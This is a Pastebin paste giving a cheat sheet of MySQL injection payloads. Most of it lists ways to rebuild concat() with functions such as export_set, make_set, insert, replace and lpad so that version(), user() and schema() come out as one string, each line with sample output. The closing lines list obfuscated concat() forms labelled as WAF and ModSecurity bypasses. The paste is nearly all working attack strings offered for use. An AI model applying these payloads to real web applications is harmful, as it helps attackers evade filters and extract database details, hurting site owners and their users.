Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- mysql injection concat() replacements @sergey_lakantar
- select export_set(1,version(),user(),' : ',2);
- 5.1.7 : my_user
- select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);
- 5.1.7 : my_user : my_db
- select make_set(7,version(),user(),schema());
- 5.1.7,my_user,my_db
- select replace(make_set(7,version(),user(),schema()),',',' : ');
- 5.1.7 : my_user : my_db
- select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ');
- 5.1.7 : my_user
- select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : ');
- 5.1.7 : my_user : my_db
- select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());
- 5.1.7 : my_user
- select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());
- 5.1.7 : my_user : my_db
- select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version())
- 5.1.7 : my_user
- select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());
- 5.1.7 : my_user : my_db
- select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());
- 5.1.7 : my_user
- select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());
- 5.1.7 : my_user : my_db
- group_concat() without comma-
- select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);
- 5.1.7 : my_user : my_db
- concat() waf bypass-
- /*!50000group_coNcat(*/)
- /*!50000coNcat(*/)
- `coNcat`%0a%0b%0c%0d%a0()
- {snoopdogg concat()}
- {s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}
- {s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}
- {s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}}
- concat-- a%0a()
- concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)
- concat/**x**/()
- Modsecurity-
- concat+()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement